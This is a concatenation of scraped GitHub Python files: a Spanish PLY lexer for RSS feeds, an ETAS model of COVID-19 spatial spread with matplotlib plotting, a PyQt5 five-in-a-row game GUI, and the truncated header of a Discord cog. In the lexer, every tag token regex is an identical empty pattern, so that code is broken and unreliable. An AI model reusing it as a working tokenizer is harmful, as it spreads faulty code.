'CIERRE_LANGUAGE', 'APERTURA_WEBMASTER', 'CIERRE_WEBMASTER', 'URL', 'APERTURA_ULTEDIT', 'CIERRE_ULTEDIT', 'APERTURA_AUTOR','CIERRE_AUTOR', 'APERTURA_BD', 'CIERRE_BD', 'APERTURA_GUID', 'CIERRE_GUID', 'APERTURA_TTL', 'CIERRE_TTL',\n    ]\n\ntokens = reservadas+['TXT', 'NUM',]\n\n\nt_APERTURA_XML =r'\\<\\?xml'\nt_VERSION_XML =r'\\ version=\"1.0\"'\nt_ENCODING_VERSION= r'\\ encoding=\"UTF-8\"'\nt_CIERRE_XML= r'\\?\\>'\n#rss tokens\nt_APERTURA_RSS=r'\\'\nt_CIERRE_RSS=r'\\'\n#general tag tokens\nt_APERTURA_CHANNEL = r'\\'\nt_CIERRE_CHANNEL = r'\\' \nt_APERTURA_TITLE = r'\\'\nt_CIERRE_TITLE = r'\\'\nt_APERTURA_LINK=r'\\'\nt_CIERRE_LINK=r'\\'\nt_APERTURA_DESC=r'\\'\nt_CIERRE_DESC=r'\\'\nt_APERTURA_CAT=r'\\'\nt_CIERRE_CAT=r'\\'\nt_APERTURA_COPY=r'\\'\nt_CIERRE_COPY=r'\\'\nt_APERTURA_IMAG=r'\\'\nt_CIERRE_IMAG=r'\\'\nt_APERTURA_HEIGHT=r'\\'\nt_CIERRE_HEIGHT=r'\\'\nt_APERTURA_WIDTH=r'\\'\nt_CIERRE_WIDTH=r'\\'\nt_APERTURA_ITEM=r'\\'\nt_CIERRE_ITEM=r'\\'\nt_APERTURA_LANGUAGE=r'\\'\nt_CIERRE_LANGUAGE=r'\\'\nt_APERTURA_WEBMASTER=r'\\'\nt_CIERRE_WEBMASTER=r'\\'\nt_APERTURA_ULTEDIT=r'\\'\nt_CIERRE_ULTEDIT=r'\\'\nt_APERTURA_AUTOR=r'\\'\nt_CIERRE_AUTOR=r'\\'\nt_APERTURA_BD=r'\\'\nt_CIERRE_BD=r'\\'\nt_APERTURA_GUID=r'\\'\nt_CIERRE_GUID=r'\\'\nt_APERTURA_TTL=r'\\'\nt_CIERRE_TTL=r'\\'\nt_ignore = '\\t'\n\n#symbol token definition\ndef t_URL(t):\n    r'(https|http|ftp|ftps)://(?:[a-zA-Z0-9]*[.][a-zA-Z]*[a-zA-Z.0-9?%/_=:#&$-]*)'\n    t.type='URL'\n    return t\n\n#text string token definition\ndef t_TXT(t): \n\tr'[a-zA-Z][a-zA-Z.,:\\:\\+\\t áéíóú0-9]*'\n\tif t.value.upper() in reservadas:\n\t\tt.value = t.value.upper()\n\t\tt.type = t.value\n\n\treturn t\n\n\n#number string token definition\ndef t_NUM(t):\n\tr'\\d+'\n\tt.value = int(t.value)\n\treturn t\n\n#URL string token definition\n\n \n#page break definition\ndef t_newline(t):\n\tr'\\n+'\n\tt.lexer.lineno += len(t.value)\n\n\ndef t_COMMENT(t):\n\tr'\\#.*'\n\tpass\n\ndef t_error(t):\n\t#print (\" LexToken(SALTODEPAG)%s'\" % t.value[0])\n\tt.lexer.skip(1)\n\nanalizador = lex.lex()", "repo_name": "deadour/SSL-LexerParser", "sub_path": "src/lex.py", "file_name": "lex.py", "file_ext": "py", "file_size_in_byte": 2876, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ply.lex.lex", "line_number": 100, "usage_type": "call"}, {"api_name": "ply.lex", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "26649923055", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom math import pi\nfrom scipy import signal\n\ndef pdegconv(a,s):\n    r'''pad given 1D sequence a using edge values and convolve it with s:\n    inputs:\n        a--1D sequence (1D float(int) array: (na-))\n        s--smoother (1D float(int) array: (ns-))\n    output:\n        smoothed 1D sequence (1D float array: (na-))'''\n    ns = len(s)\n    if ns % 2:\n        pl = int((ns-1)/2) # ns must be odd\n    else:\n        raise ImportError('The smoother length must be odd!')\n    apeg = np.pad(a,(pl,pl),'edge')\n    y = np.convolve(apeg,s,'valid')\n    return y\n\nclass infevnt:\n    def __init__(self):\n        r'''initialize an infection event'''\n        self.indx = np.zeros((0,2),dtype=np.int16)\n        self.indt = np.zeros(0,dtype=np.int16)\n        self.Ni = np.zeros(0,dtype=np.int16)\n        self.ne = 0\n    \n    def evnt_add(self,indx,indt,Ni):\n        r'''add extra events into current history:\n        inputs:\n            indx--infection event position grid indices (2D int array: (ne-by-2))\n            indt--infection event time (1D int array: (ne-))\n            Ni--infection number of this event (1D int 
array: (ne-))'''\n        self.indx = np.concatenate((self.indx,indx),axis=0)\n        self.indt = np.concatenate((self.indt,indt),axis=0)\n        self.Ni = np.concatenate((self.Ni,Ni),axis=0)\n        self.ne += len(Ni)\n    \n    def evnt_del(self,Hd_d):\n        r'''reduce events from current history:\n        inputs:\n            Hd_d--event history being deleted (infevnt class)'''\n        mask = np.zeros(self.ne,dtype=bool)\n        for i in range(Hd_d.ne):\n            mask += (Hd_d.indx[i,0]==self.indx[:,0])\\\n                    *(Hd_d.indx[i,1]==self.indx[:,1])\\\n                    *(Hd_d.indt[i]==self.indt)\\\n                    *(Hd_d.Ni[i]==self.Ni)\n        self.indx = self.indx[~mask]\n        self.indt = self.indt[~mask]\n        self.Ni = self.Ni[~mask]\n        self.ne = len(self.Ni)\n\n    def evnt_t(self,indt):\n        r'''find infection events at time indt:\n        input:\n            indt--time of the infection event (int scalar)'''\n        mask = self.indt==indt\n        return self.indx[mask], self.Ni[mask]\n    \n    def NIcal(self,tr):\n        r'''calculate total infected number along time:\n        input:\n            tr--time indices (1D int array: (nt-))'''\n        nt = len(tr)\n        NI = np.zeros(nt)\n        for i in range(nt):\n            _, Ni = self.evnt_t(tr[i])\n            NI[i] = np.sum(Ni)\n        return NI\n    \n    def Ical(self,dmg,t):\n        r'''calculate the immunity ratio at time t:\n        input:\n            dmg--population density (2D float array: (ny-by-nx))\n            t--time index (int scalar)\n        '''\n        I = np.zeros_like(dmg)\n        for i in range(t):\n            indx, Ni = self.evnt_t(i)\n            if len(Ni) > 0:\n                sub = tuple(indx.transpose())\n                I[sub] += Ni/dmg[sub]\n        return I\n    \n    def LdHdNi_cal(self,nt):\n        r'''calculate Ld and HdNi up to time t:\n        inputs:\n            nt--time index (int scalar)\n        outputs:\n            Ld--infection event number at each day (1D int array: (nt-))\n            HdNi--infected number for each event, aligned from day 0 to t (1D int array: (Nt-))'''\n        Ld = np.zeros(nt,dtype=np.int16)\n        HdNi = np.zeros(0,dtype=np.int16)\n        for i in range(nt):\n            _, Ni = self.evnt_t(i)\n            Ld[i] = len(Ni)\n            if Ld[i] != 0:\n                HdNi = np.concatenate((HdNi,Ni))\n        return Ld, HdNi\n\ndef gd(t,tau,sig,cf=None,norm=True):\n    r'''create temporal function for the infectability of an infectious disease:\n    inputs:\n        t--time sequence (1D float array: (nt-))\n        tau--time of peak symptoms (float scalar)\n        sig--standard deviation of the infectability distribution along time (float scalar)\n        cf--cutoff time for the infectability function, due to quarantine or hospitalization (float scalar)\n    output:\n        y--infectability time sequence (1D float array: (nt-))'''\n    y = np.exp(-0.5*((t-tau)/sig)**2)\n    if norm:\n        y = y/np.sum(y)\n    if cf is not None:\n        y = y[t<=cf]\n    return y \n    \nclass fxxi:\n    r'''spatial intensity distribution: Gaussian plus stationary background (proportional to log scale population distribution)'''\n    def __init__(self, shape, effarea=None, bkd=None):\n        r'''shape--structure modeling area (int tuple: (2-))\n        effarea--effective area mask (2D boolean array, (ny-by-nx))\n        bkd--background distribution (2D float array, (ny-by-nx))'''\n        self.shape = shape\n        if effarea is None:\n            self.effarea = np.ones(shape, dtype=bool) # default effarea is the total structure area\n        else:\n            self.effarea = effarea # effarea is the given mask\n        # global background\n        if bkd is None:\n            self.bkd = np.zeros(shape)\n            self.bkd[self.effarea] = 1/np.sum(self.effarea) # default bkd is homogeneous\n        else:\n            self.bkd = bkd/np.sum(bkd[self.effarea])\n            self.bkd[~self.effarea] = 0 # bkd is the given bkd normalized within the effarea\n    \n    def _gaussfun(self,sig):\n        r'''Gaussian possibility function:\n        input:\n            sig--standard deviation of the Gaussian possibility function (float scalar)\n        output:\n            local Gaussian distribution (2D float array: 
(ngy-by-ngx))'''\n        # the size of the gaussian filter is ny-by-ny\n        ny = int(2*np.around(3*sig)+1)\n        nx = ny\n        G = np.zeros((ny,nx))\n        # generate grid and center\n        [Y, X] = np.meshgrid(range(ny),range(nx), indexing='ij')\n        xc = (ny/2,nx/2)\n        r2 = (X-xc[1])**2+(Y-xc[0])**2\n        G = 1/(sig**2*2*pi)*np.exp(-0.5*r2/sig**2)\n        G = G/np.sum(G)\n        return G\n    \n    def convplus(self, gNi_map, sig, wG):\n        r'''calculate the spatial intensity distribution according to given infection map:\n        input:\n            gNi_map--total infection number for all infection events that have influence up to time t (2D int array: (ny-by-nx))\n            wG--Gaussian distribution weight (float scalar)\n        output:\n            expected infection intensity (2D float array: (ny-by-nx)) '''\n        gx = self._gaussfun(sig)\n        y = wG*signal.convolve2d(gNi_map, gx, mode='same') # local Gaussian\n        y += (1-wG)*np.sum(gNi_map)*self.bkd # global background\n        y[~self.effarea] = 0 # mute outside the valid area\n        return y\n\nclass ifds_ETAS:\n    r'''create infectious disease spreading model and predict future infected distribution based on ETAS'''\n    def __init__(self,dmg,gn,N0,k,a,fx,Hd=None):\n        r'''initialization:\n        inputs:\n            dmg--population distribution (2D float array: (ny-by-nx))\n            gn--normalized infectability time sequence (1D float array: (ng-))\n            ng--length of gn (int scalar)\n            N0--infected number threshold for single infection event (int scalar)\n            k,a--hd parameters (float scalar)\n            fx--spatial infection PDF (fxxi class)'''\n        self.dmg = dmg\n        self.gn = gn\n        self.ng = len(gn)\n        self.N0 = N0\n        self.k = k\n        self.a = a\n        self.fx = fx\n        self.size = fx.bkd.size\n        if Hd is None:\n            self.Hd = infevnt()\n        else:\n            self.Hd = Hd\n    \n    def LdnI_cal(self,t,R0,I,sig,wG):\n        r'''According to infection event history and current R0, sig, wG, as well as fxxi, predict next day's infection:\n        inputs:\n            t--current day index (int scalar)\n            R0--current reproduction number (float scalar)\n            sig--current short-distance human movement range (float scalar)\n            wG--current weight for short-distance human movement within total movement (including short-distance and long-distance)\n        output:\n            nI--next-day expected infection distribution (2D float array: (ny-by-nx))\n            Ld--infection event number at day t (int scalar)'''\n        y = np.zeros(self.fx.shape)\n        Ld = 0\n        for i in range(self.ng):\n            indt = t-i-1\n            if indt<0:\n                continue\n            indx, Ni = self.Hd.evnt_t(indt)\n            subx = tuple(indx.transpose())\n            y[subx] += Ni*self.gn[i]\n            Ld += np.sum(self.k*(Ni/self.N0)**self.a*self.gn[i])\n        if np.all(y==0):\n            nI = y\n        else:\n            nI = R0*(1-I)*self.fx.convplus(y,sig,wG)\n        return Ld,nI\n\n    def formod(self,R0t,sigt,wGt,t0=0,I0=None,Hdi=None):\n        r'''modeling infectious disease spreading from day t0, according to given parameters:\n        inputs:\n            R0t--basic reproduction number for the modeled nt days (1D float array: (nt-))\n            sigt--Gaussian distribution (short-distance human movement) parameter varying within nt days (1D float array: (nt-))\n            wGt--Gaussian distribution (short-distance human movement) weight varying within nt days (1D float array: (nt-))\n            t0--starting day index (int scalar)\n            I0--immunity at the starting day t0 (2D float array: (ny-by-nx))\n            Hdi--imported infection events (infevnt class)\n        output:\n            self.Hd--updated community infection events (infevnt class)\n            nIt--expected infected distributions of modeled nt days (nt-by-ny-by-nx)'''\n        \n        ################################\n        # some random perturbation on predicted Ld and Ni\n        ptbN = np.random.normal(scale=0.2,size=100000)\n        ptbN[ptbN<-0.95] = -0.95\n        ptbN[ptbN>0.95] = 0.95\n        c = 0\n        
################################\n        \n        nt = len(R0t)\n        nIt = np.zeros((nt,self.fx.shape[0],self.fx.shape[1]))\n        if I0 is None:\n            I0 = np.zeros(self.fx.shape)\n        I = I0\n        if Hdi is None:\n            Hdi = infevnt()\n        # step forward from t0\n        for i in range(nt):\n            print(f'{i}/{nt}')\n            t = i+t0\n            # calculate susceptible population\n            Ns = self.dmg*(1-I)\n            # import infection events\n            indx, Ni = Hdi.evnt_t(t)\n            indt = np.zeros_like(Ni)+t\n            self.Hd.evnt_add(indx,indt,Ni)\n            # calculate nI and Ld\n            Ld, nI = self.LdnI_cal(t,R0t[i],I,sigt[i],wGt[i])\n            ### perturb and int Ld ###\n            Ld = int(Ld*(1+ptbN[c]))\n            c += 1\n            ### perturb and int Ld ###\n            nIt[i] = nI\n            if Ld != 0:\n                nIf = nI.flatten()\n                NI = np.sum(nIf)\n                # sampling Ld positions \n                ind = np.random.choice(self.size,size=Ld,replace=False,p=nIf/NI)\n                sub = np.unravel_index(ind,self.fx.shape)\n                indx = np.array(sub).transpose()\n                # add new infection events into Hd\n                indt = np.zeros(Ld,dtype=np.int16)+t\n                Ni = NI*nI[sub]/np.sum(nI[sub])\n                ### perturb and int Ni ###\n                Ni = np.array(Ni*(1+ptbN[c:c+Ld]),dtype=np.int16)\n                c += Ld\n                ### perturb and int Ni ###\n                Nss = np.array(Ns[sub],dtype=np.int16)\n                Ni[Ni>Nss] = Nss[Ni>Nss]\n                self.Hd.evnt_add(indx,indt,Ni)\n                # update I\n                I[sub] += Ni/self.dmg[sub]\n            I[I>1] = 1\n        return nIt\n    \nclass dispift:\n    r'''display infection events and expected infection distribution'''\n    def __init__(self,fx,dpi=80,outpath=None):\n        r'''input:\n            fx--fxxi class'''\n        self.bkd = fx.bkd\n        self.bkd[~fx.effarea] = float(\"nan\")\n        self.shape = fx.shape\n        [Y,X] = np.meshgrid(range(self.shape[0]),range(self.shape[1]), indexing='ij')\n        self.Y = Y\n        self.X = X\n        self.dpi = dpi\n        self.path = outpath\n    \n    def setscale(self,ax):\n        r'''plot the scale indicator on ax'''\n        x1 = 300\n        x2 = 380\n        x3 = 330\n        y1 = 220\n        y2 = 215\n        y3 = 210\n        ax.set_xticks([])\n        ax.set_yticks([])\n        ax.plot([x1,x2],[y1,y1],'r',linewidth=3,zorder=100)\n        ax.plot([x1,x1],[y1,y2],'r',linewidth=3,zorder=100)\n        ax.plot([x2,x2],[y1,y2],'r',linewidth=3,zorder=100)\n        _ = ax.text(x3,y3,'10 km',color='r',fontsize=15,zorder=100)\n    \n    def setinform(self,ax,t,Ld,NI):\n        x0 = 20\n        y0 = 20\n        x1 = 360\n        y1 = 40\n        ax.text(x0,y0,f'Day: {t}',color='k',fontsize=15,zorder=100)\n        ax.text(x1,y0,f'$\\\lambda_d={Ld}$',color='k',fontsize=15,zorder=100)\n        ax.text(x1,y1,f'$N_I={NI}$',color='k',fontsize=15,zorder=100)\n    \n    def dispevnt_history(self,t,Hdc,Hdi=None):\n        r'''display the infection events along time from day 0 to day t:\n        inputs:\n            t: last day being plotted (int scalar)\n            Hdc: community infection event history (infevnt class)\n            Hdi: imported infection event history (infevnt class)'''\n        yc = np.zeros(self.shape)\n        yi = np.zeros(self.shape)\n        for i in range(t):\n            # plot background\n            fig, ax = plt.subplots(1,1,figsize=(20,9),frameon=True)\n            ax.imshow(self.bkd,cmap='gray',zorder=10)\n            ne = 0\n            NI = 0\n            indx, Ni = Hdc.evnt_t(i)\n            subx = tuple(indx.transpose())\n            yc[subx] += Ni\n            mask = yc!=0\n            ne += len(Ni)\n            NI += np.sum(Ni)\n            ax.scatter(self.X[mask],self.Y[mask],s=yc[mask], alpha=0.7, c='blue', zorder=30)\n            if Hdi is not None:\n                indx, Ni = Hdi.evnt_t(i)\n                subx = tuple(indx.transpose())\n                yi[subx] += Ni\n                mask = yi!=0\n                ne += len(Ni)\n                NI += np.sum(Ni)\n                ax.scatter(self.X[mask],self.Y[mask],s=yi[mask], alpha=0.7, c='orange', zorder=40) \n            self.setscale(ax)\n            self.setinform(ax,i,ne,NI)\n            for axis in ['top','bottom','left','right']:\n                ax.spines[axis].set_linewidth(4)\n            plt.show()\n            if self.path is not None:\n                BB = ax.get_position()\n                BB.x0 = 4.2\n                BB.x1 = 16.3\n                BB.y0 = 1\n                BB.y1 = 8\n                
fig.savefig(f'{self.path}/evnt_history_day_0-{i}.png',dpi=self.dpi,bbox_inches=BB)\n    \n    \n    def dispevnt_current(self,t,Hdc,Hdi=None):\n        r'''display the infection events at day t:\n        inputs:\n            t: the day being plotted (int scalar)\n            Hdc: community infection event history: (infevnt class)\n            Hdi: imported infection event history: (infevnt class)'''\n        yc = np.zeros(self.shape)\n        yi = np.zeros(self.shape)\n        ne = 0\n        NI = 0\n        indx, Ni = Hdc.evnt_t(t)\n        subx = tuple(indx.transpose())\n        yc[subx] = Ni\n        mask = yc!=0\n        ne += len(Ni)\n        NI += np.sum(Ni)\n        # plot background\n        fig, ax = plt.subplots(1,1,figsize=(20,9),frameon=True)\n        ax.imshow(self.bkd,cmap='gray',zorder=10)\n        ax.scatter(self.X[mask],self.Y[mask],s=yc[mask], alpha=0.7, c='blue', zorder=30)\n        if Hdi is not None:\n            indx, Ni = Hdi.evnt_t(t)\n            subx = tuple(indx.transpose())\n            yi[subx] = Ni\n            mask = yi!=0\n            ne += len(Ni)\n            NI += np.sum(Ni)\n            ax.scatter(self.X[mask],self.Y[mask],s=yi[mask], alpha=0.7, c='orange', zorder=40)\n        self.setscale(ax)\n        self.setinform(ax,t,ne,NI)\n        for axis in ['top','bottom','left','right']:\n            ax.spines[axis].set_linewidth(4)\n        plt.show()\n        if self.path is not None:\n            BB = ax.get_position()\n            BB.x0 = 4.2\n            BB.x1 = 16.3\n            BB.y0 = 1\n            BB.y1 = 8\n            fig.savefig(f'{self.path}/infevnt_day_{t}.png',dpi=self.dpi,bbox_inches=BB)\n    \n    def dispnI(self,t,nI,indx,Ni):\n        r'''display the infection events and the expected infected distribution at day t:\n        inputs:\n            t--day index (int scalar)\n            nI--expected infected distribution at day t (2D float array: (ny-by-nx))\n            indx--infection event positions at day t (2D int array: (ne-by-2))\n            Ni--infected number of infection events at day t (1D int array: (ne-))'''\n        y = np.zeros(self.shape)\n        subx = tuple(indx.transpose())\n        y[subx] = Ni\n        mask = y!=0\n        NI = np.sum(nI)\n        if NI==0:\n            nI[0,0] = 1\n            NI = 1\n        # plot background\n        fig, ax = plt.subplots(1,1,figsize=(20,9),frameon=True)\n        ax.imshow(self.bkd,cmap='gray',zorder=10)\n        ax.imshow(-nI/NI,cmap='hot',alpha=0.9,zorder=20)\n        #ax.scatter(self.X[mask],self.Y[mask],s=y[mask], alpha=0.7, c='green', zorder=30)\n        self.setscale(ax)\n        self.setinform(ax,t,len(Ni),np.sum(Ni))\n        for axis in ['top','bottom','left','right']:\n            ax.spines[axis].set_linewidth(2)\n        if self.path is not None:\n            BB = ax.get_position()\n            BB.x0 = 4.2\n            BB.x1 = 16.3\n            BB.y0 = 1\n            BB.y1 = 8\n            fig.savefig(f'{self.path}/expinfdis_day_{t}.png',dpi=self.dpi,bbox_inches=BB)\n        plt.show()\n\n\n", "repo_name": "nusbei/COVID-19-modeling", "sub_path": "ETAS_fun.py", "file_name": "ETAS_fun.py", "file_ext": "py", "file_size_in_byte": 17607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.pad", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 45, 
"usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 150, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.signal.convolve2d", "line_number": 165, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 235, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 269, "usage_type": "attribute"}, {"api_name": "numpy.unravel_index", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 273, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 276, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 279, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 335, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 335, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 
344, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 352, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 400, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 400, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 420, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 430, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}]} +{"seq_id": "38020012357", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QApplication, QMessageBox\nfrom FiveInRow import FiveInRow\nfrom FiveInRowPlayers import FiveInRowPlayer\nfrom MinimaxPlayer import MinimaxPlayer\nfrom time import sleep\n\nclass FiveInRowCell(QPushButton):\n def __init__(self, txt, x, y):\n super().__init__(txt)\n self.x = x\n self.y = y\n\n def getCoordinates(self):\n return (self.y, self.x)\n\nclass FiveInRowGui(QWidget):\n startSignal = pyqtSignal()\n endSignal = pyqtSignal(int)\n\n def __init__(self):\n\n super().__init__()\n\n self.startSignal.connect(self.constructBoard)\n self.endSignal.connect(self.endGame)\n\n self.grid = QGridLayout()\n self.grid.setSpacing(0)\n self.setLayout(self.grid)\n\n self.player = None\n self.move = None\n self.gameOver = False\n\n self.setWindowTitle('FiveInRow')\n self.show()\n\n self.symbols = [' ', 'X', 'O']\n self.colors = ['black', 'red', 'blue']\n\n def colorToStyle(self, color):\n return 'QPushButton {color: ' + color + '; font-size: 24pt;}'\n\n def cellClicked(self):\n if self.move is None:\n self.move = self.sender().getCoordinates()\n if self.player is not None:\n idx = self.player.number\n self.sender().setText(self.symbols[idx])\n self.sender().setStyleSheet(self.colorToStyle(self.colors[idx]))\n print(self.move)\n\n def startTurn(self, player):\n #self.constructBoard(board)\n self.move = None\n self.player = player\n self.startSignal.emit()\n\n def getMove(self):\n return self.move\n\n def endGame(self, winner):\n if self.gameOver:\n return\n\n self.gameOver = True\n\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n\n txt = \"It's a draw!\" if winner == 0 else \"Player\" + str(winner) + \" wins!\"\n msg.setText(txt)\n msg.setWindowTitle(txt)\n\n msg.setStandardButtons(QMessageBox.Ok)\n msg.buttonClicked.connect(msg.close)\n\n msg.exec_()\n\n def constructBoard(self):\n if self.player is None:\n return\n\n for x,row in enumerate(self.player.game.board):\n for y,cell in enumerate(row):\n\n cellButton = 
FiveInRowCell(self.symbols[cell], x, y)\n cellButton.setFixedSize(50,50)\n cellButton.setStyleSheet(self.colorToStyle(self.colors[cell]))\n cellButton.clicked.connect(self.cellClicked)\n self.grid.addWidget(cellButton, x, y)\n\nclass QtPlayer(FiveInRowPlayer):\n def __init__(self, gui):\n super().__init__()\n self.gui = gui\n\n def requestMove(self):\n self.gui.startTurn(self)\n move = None\n while move is None:\n sleep(0.2)\n move = self.gui.getMove()\n return move\n\n def notifyWin(self):\n self.gui.startTurn(self)\n self.gui.endSignal.emit(self.number)\n\n def notifyLoss(self):\n self.gui.startTurn(self)\n self.gui.endSignal.emit(self.opponentNumber)\n\n def notifyDraw(self):\n if self.number == 1:\n self.gui.endSignal.emit(0)\n\n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n gamegui = FiveInRowGui()\n\n p1 = QtPlayer(gamegui)\n #p2 = QtPlayer(gamegui)\n p2 = MinimaxPlayer(5)\n\n game = FiveInRow(p1, p2)\n game.start()\n\n sys.exit(app.exec_())\n game.join()\n", "repo_name": "mvjseppa/FiveInRow", "sub_path": "QtPlayer.py", "file_name": "QtPlayer.py", "file_ext": "py", "file_size_in_byte": 3559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Information", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Ok", "line_number": 80, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 80, "usage_type": "name"}, {"api_name": "FiveInRowPlayers.FiveInRowPlayer", "line_number": 98, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 126, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 126, "usage_type": "attribute"}, {"api_name": "MinimaxPlayer.MinimaxPlayer", "line_number": 131, "usage_type": "call"}, {"api_name": "FiveInRow.FiveInRow", "line_number": 133, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "42344114668", "text": "# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCryptide Forbidden Cog\r\n~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nThis Allows Forbidden/Owner/Test Commands That Need/Use Cog Functions To Be Used As An Extension.\r\n\r\n:copyright: 